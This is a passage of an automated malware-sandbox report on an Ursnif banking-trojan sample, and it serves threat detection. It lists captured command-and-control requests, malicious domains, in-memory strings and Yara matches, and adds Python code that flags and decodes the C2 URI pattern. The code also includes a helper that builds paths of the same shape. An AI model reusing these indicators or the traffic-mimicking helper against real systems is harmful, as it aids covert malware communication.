                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/FXgqIY2YIG4/C7y4oW_2FqnMiT/UXE8adViqK_2F0elSuUWK/zwOfFpRmM9Pcjtlo/mhxUAWIol_2Bidj/ZyUBkmkt9UDUf59heB/_2Fa01_2F/fe5khD18VNL3grTs1oBD/Gp7Xm3KoaUrn2NbkVi4/PAUVXoXppe_2FqPWphraUo/OvKmQ_2F/8LQ.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global traffic | HTTP traffic detected: GET /signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84ucCmHqd/ux_2BgaSfPaBMcDfNjzb3/rbrRSArhJJpb3rOW/xdA1Wy83LoKT_2F/eny3XPOONMNlhwdGDb/HeEQC75Ox/PYv0ijHf_2BV06O4iZeM/ZM8mz_2FbpTp5AwODR0/XLpKCg0_2Ffc7auFjvx4p8/3b.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/jpKr3VzL6CFU/K4QwQLlZ56e/n3MZDuNS62Sf0R/mD2lfs_2FQXwlgYrd0DFL/pEDSMAvGReZoZ8Jm/OSgzsTstfQRz_2F/2Bp8zA9yijiTKRH09Q/Mwm_2F7JH/xI5SfnAXURadBpSsyjtC/_2BEE4TT4VBjXUCp_2B/cYd5vNurcHADHrS6HheJd6/UAnImB8Jw2Ynr/9pKHwbRP/FStf.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: global traffic | HTTP traffic detected: GET /mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/48oXcRIDJ4CWvryCIOce07l/PRm5ekLf_2/FWrUO776bg5a24LJQ/ndIkg4SZse4c/jL7OG2Z00xG/sTPur68E_2BxS_/2FjGzTP4SxNpm_2FiKI7j/WPoFKl4.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
                      Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
                      Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49798 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49846
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: 0c8d249e-2aa6-4c4b-c0dd-a86db3f73cbe | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | X-CalculatedFETarget: AM0PR02CU003.internal.outlook.com | X-BackEndHttpStatus: 404 | X-FEProxyInfo: AM0PR02CA0079.EURPRD02.PROD.OUTLOOK.COM | X-CalculatedBETarget: AM0PR10MB2530.EURPRD10.PROD.OUTLOOK.COM | X-BackEndHttpStatus: 404 | X-RUM-Validated: 1 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: niSNDKYqS0zA3ahts/c8vg.1.1 | X-FEServer: AM0PR02CA0079 | X-Powered-By: ASP.NET | X-FEServer: AM6PR10CA0074 | Date: Mon, 11 Oct 2021 22:23:43 GMT | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: 404aa930-782f-c767-6fa8-22dabae1af7b | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Alt-Svc: h3=":443",h3-29=":443" | X-CalculatedFETarget: VI1PR04CU006.internal.outlook.com | X-BackEndHttpStatus: 404 | X-FEProxyInfo: VI1PR04CA0106.EURPRD04.PROD.OUTLOOK.COM | X-CalculatedBETarget: VI1P191MB0174.EURP191.PROD.OUTLOOK.COM | X-BackEndHttpStatus: 404 | X-RUM-Validated: 1 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: MKlKQC94Z8dvqCLauuGvew.1.1 | X-FEServer: VI1PR04CA0106 | X-Powered-By: ASP.NET | X-FEServer: AM6P191CA0036 | Date: Mon, 11 Oct 2021 22:23:43 GMT | Connection: close
                      Source: loaddll32.exe, 00000000.00000003.661990897.0000000000E0F000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.828806436.0000000002C7E000.00000004.00000020.sdmp, WerFault.exe, 00000010.00000003.592082392.00000000052F7000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.603683328.0000000004B23000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: WerFault.exe, 00000010.00000003.590261619.000000000536E000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-op
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.578061869.0000000002CDF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp | String found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.578061869.0000000002CDF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp | String found in binary or memory: http://ogp.me/ns/fb#
                      Source: rundll32.exe, 00000003.00000003.754496414.0000000002CB9000.00000004.00000001.sdmp | String found in binary or memory: https://areuranel.website/#
                      Source: rundll32.exe, 00000003.00000003.754370458.0000000002C7E000.00000004.00000001.sdmp | String found in binary or memory: https://areuranel.website/liopolo/C_2BfXb0gV5jtbUa/IZmGbVhjqtQp_2F/7qZce0oXF332X4bIP1/uoX46bOOY/izB1
                      Source: loaddll32.exe, 00000000.00000003.575544981.0000000000E52000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmp | String found in binary or memory: https://blogs.msn.com/
                      Source: loaddll32.exe, 00000000.00000003.662022513.0000000000E31000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.826574665.0000000000E31000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.828429749.0000000002C1A000.00000004.00000020.sdmp | String found in binary or memory: https://breuranel.website/
                      Source: rundll32.exe, 00000003.00000002.828429749.0000000002C1A000.00000004.00000020.sdmp | String found in binary or memory: https://breuranel.website/liopolo/53U65wbAztycwApkbN/Nm6o3zX96/bvCraxUdm00FZ4WM5Wps/p_2FNPk5Ls6JTWqI
                      Source: rundll32.exe, 00000003.00000003.665024714.0000000002C7E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.664845337.0000000002CE0000.00000004.00000001.sdmp | String found in binary or memory: https://breuranel.website/liopolo/wv4vNBBA798s7/I_2FCPxa/4F4kPL6kvjyV14SrT2YW8wi/GOKS69LDnM/P4sY8Z0h
                      Source: rundll32.exe, 00000003.00000003.602334968.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756181648.0000000002CDE000.00000004.00000001.sdmp | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633990980&rver
                      Source: rundll32.exe, 00000003.00000003.602334968.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633990982&rver
                      Source: loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752019684.0000000000E6A000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991064&rver
                      Source: rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756150081.0000000002CF0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756394618.00000000050CB000.00000004.00000040.sdmp | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991065&rver
                      Source: loaddll32.exe, 00000000.00000003.751977589.0000000000E6C000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752047110.00000000034CC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756150081.0000000002CF0000.00000004.00000001.sdmp | String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: loaddll32.exe, 00000000.00000002.827255923.0000000000E66000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.602499638.0000000002C6E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.828429749.0000000002C1A000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756167295.0000000002CEC000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.602351410.0000000002C7E000.00000004.00000001.sdmp | String found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000000.00000003.661990897.0000000000E0F000.00000004.00000001.sdmp | String found in binary or memory: https://msn.com/&&
                      Source: rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp | String found in binary or memory: https://msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/G
                      Source: rundll32.exe, 00000003.00000003.799456741.0000000002CE3000.00000004.00000001.sdmp | String found in binary or memory: https://msn.com:443/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3
                      Source: loaddll32.exe, 00000000.00000003.662022513.0000000000E31000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.com/
                      Source: rundll32.exe, 00000003.00000003.710988432.0000000002C7E000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/
                      Source: rundll32.exe, 00000003.00000003.710988432.0000000002C7E000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/GS
                      Source: rundll32.exe, 00000003.00000003.754595048.0000000002C6E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.710988432.0000000002C7E000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.office365.com/signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/p
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752019684.0000000000E6A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.602334968.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756150081.0000000002CF0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756394618.00000000050CB000.00000004.00000040.sdmp | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.751977589.0000000000E6C000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: loaddll32.exe, 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp | String found in binary or memory: https://web.vortex.data.msn.com
                      Source: loaddll32.exe, 00000000.00000003.575544981.0000000000E52000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.751977589.0000000000E6C000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.577966306.0000000002CD9000.00000004.00000001.sdmp | String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: rundll32.exe, 00000003.00000003.602425029.0000000002CB9000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/
                      Source: rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fC3nZ3ojPKuvLDFaD_2FVNtz%2fi_2BIT_2FM%2fPkJe7W3e825Ul
                      Source: rundll32.exe, 00000003.00000003.756366397.00000000050CC000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fQXqV1Cwmdgy9RAxuvo%2feyRDOSF4h%2fn5Xdvl6macAzIHUi6g_
                      Source: loaddll32.exe, 00000000.00000003.751977589.0000000000E6C000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fjpKr3VzL6CFU%2fK4QwQLlZ56e%2fn3MZDuNS62Sf0R%2fmD2lfs
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fr_2FdFpkR4VdtsN08a%2f_2BmiRrdo%2fiRPVi0tWAScg5sVGfo6
                      Source: loaddll32.exe, 00000000.00000003.575764706.0000000003449000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752071962.00000000034CB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.752019684.0000000000E6A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.602334968.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.578191957.0000000005049000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.756150081.0000000002CF0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.756394618.00000000050CB000.00000004.00000040.sdmp | String found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: rundll32.exe, 00000003.00000003.602425029.0000000002CB9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.602351410.0000000002C7E000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/mail/liopolo/C3nZ3ojPKuvLDFaD_2FVNtz/i_2BIT_2FM/PkJe7W3e825Ul_2Ff/m4m7583Exh_2/F
                      Source: rundll32.exe, 00000003.00000003.799456741.0000000002CE3000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799504067.0000000002C72000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799523846.0000000002C7E000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3
                      Source: loaddll32.exe, 00000000.00000003.575544981.0000000000E52000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.662022513.0000000000E31000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5v
                      Source: rundll32.exe, 00000003.00000003.710948632.0000000002CDD000.00000004.00000001.sdmp | String found in binary or memory: https://www.outlook.com
                      Source: loaddll32.exe, 00000000.00000003.664473384.0000000000E64000.00000004.00000001.sdmp | String found in binary or memory: https://www.outlook.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9
                      Source: rundll32.exe, 00000003.00000003.710948632.0000000002CDD000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.754370458.0000000002C7E000.00000004.00000001.sdmp | String found in binary or memory: https://www.outlook.com/signup/liopolo/jh_2BJAUni/lkDaKSs6NPU7K6NDS/e_2FibHZsZ5a/s4oEo9go0c6/pciek84
                      Source: unknown | DNS traffic detected: queries for: msn.com
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49782 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49784 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49793 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49794 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.151.82:443 -> 192.168.2.3:49795 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49796 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.151.2:443 -> 192.168.2.3:49797 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 52.97.151.66:443 -> 192.168.2.3:49798 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49846 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49848 version: TLS 1.2
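The HTTP rows above all share one shape: a two-segment prefix (/mail/liopolo/ or /signup/liopolo/), then a long run of random-length path segments made only of base64 characters plus the escapes _2B and _2F, a .jre suffix, a fixed "MSIE 8.0; Windows NT 10.0" User-Agent, and a Host header that alternates between Microsoft domains and the two .website domains found in memory. The escapes are split across segment boundaries in several rows (2YX_2Bs_/2FUMT..., m4m7583Exh_2/FXgq...), so the segments have to be joined before the escapes are undone. The Python below is an added example, not code from the report, from Joe Sandbox or from the sample: it parses request lines of this kind, reassembles the base64 layer and scores each request on the indicators visible on this page. The first request is rebuilt from the report's first HTTP row with its headers put back on CRLF lines; the benign request, its Firefox User-Agent and the round-trip payload are constructed. The decoded bytes remain encrypted by the malware, so the example stops at recovering the base64 layer.

```python
# Added example: flag and unwrap Ursnif/ISFB-style C2 URIs of the shape seen in this report.
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Exact User-Agent from the HTTP rows above. IE8 never shipped on Windows 10
# (NT 10.0 ships IE11), so the pairing is an indicator on its own.
URSNIF_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"

# Shape seen on the page: /<prefix>/<tag>/<blob split over many segments>.<ext>
PATH_RE = re.compile(
    r"^/(?P<prefix>[^/]+)/(?P<tag>[^/]+)/(?P<blob>.+)\.(?P<ext>[A-Za-z0-9]{2,4})$"
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+$")

REPORT_REQUEST = (  # rebuilt from the report's first "HTTP traffic detected" row
    "GET /mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/"
    "hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/"
    "2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/"
    "Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jre HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)\r\n"
    "Host: msn.com\r\n\r\n"
)
BENIGN_REQUEST = (  # constructed for contrast; not from the report
    "GET /en-us/index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/93.0\r\n"
    "Host: www.msn.com\r\n\r\n"
)


@dataclass
class Verdict:
    host: str
    path: str
    reasons: list = field(default_factory=list)
    blob_b64: Optional[str] = None

    @property
    def suspicious(self) -> bool:
        return len(self.reasons) >= 2


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, {lowercase header: value})."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def unwrap_blob(path: str) -> Optional[str]:
    """Rejoin the slash-split blob and undo the _2B/_2F escapes for + and /.

    Segment lengths are random, so an escape can straddle a boundary
    ('2YX_2Bs_' / '2FUMT...' in the report): join first, then replace.
    """
    m = PATH_RE.match(path)
    if not m:
        return None
    b64 = m.group("blob").replace("/", "").replace("_2B", "+").replace("_2F", "/")
    return b64 if B64_RE.match(b64) else None


def decode_blob(b64: str) -> Optional[bytes]:
    """Restore the stripped padding and decode; the bytes are still encrypted."""
    try:
        return base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def classify(raw: str) -> Verdict:
    """Score one request; two or more independent indicators mark it suspicious."""
    _method, path, headers = parse_request(raw)
    v = Verdict(host=headers.get("host", ""), path=path)
    if headers.get("user-agent") == URSNIF_UA:
        v.reasons.append("hard-coded MSIE 8.0 / Windows NT 10.0 User-Agent")
    segments = path.strip("/").split("/")
    if len(segments) >= 8:
        v.reasons.append(f"{len(segments)} path segments")
    if "_2B" in path or "_2F" in path:
        v.reasons.append("_2B/_2F escaped base64 in path")
    v.blob_b64 = unwrap_blob(path)
    if v.blob_b64 is not None and len(v.blob_b64) >= 64:
        v.reasons.append(f"{len(v.blob_b64)}-char blob reassembles to clean base64")
    return v


def wrap_blob(data: bytes, seg_len: int = 7, prefix: str = "mail",
              tag: str = "liopolo", ext: str = "jre") -> str:
    """Build a path of the same shape (test traffic only; real segment lengths vary)."""
    esc = base64.b64encode(data).decode().rstrip("=")
    esc = esc.replace("+", "_2B").replace("/", "_2F")
    segments = [esc[i:i + seg_len] for i in range(0, len(esc), seg_len)]
    return f"/{prefix}/{tag}/" + "/".join(segments) + f".{ext}"


if __name__ == "__main__":
    for req in (REPORT_REQUEST, BENIGN_REQUEST):
        v = classify(req)
        print(v.host, "SUSPICIOUS" if v.suspicious else "ok", v.reasons)
```

Run as a script it prints one verdict per request; wrap_blob produces paths of the same shape so the unwrapping can be exercised without a live sample. Note the two 404 responses above come from Microsoft's own IIS front ends, so the destination is not what to alert on here: the URI shape and the impossible User-Agent are, regardless of Host header.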

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
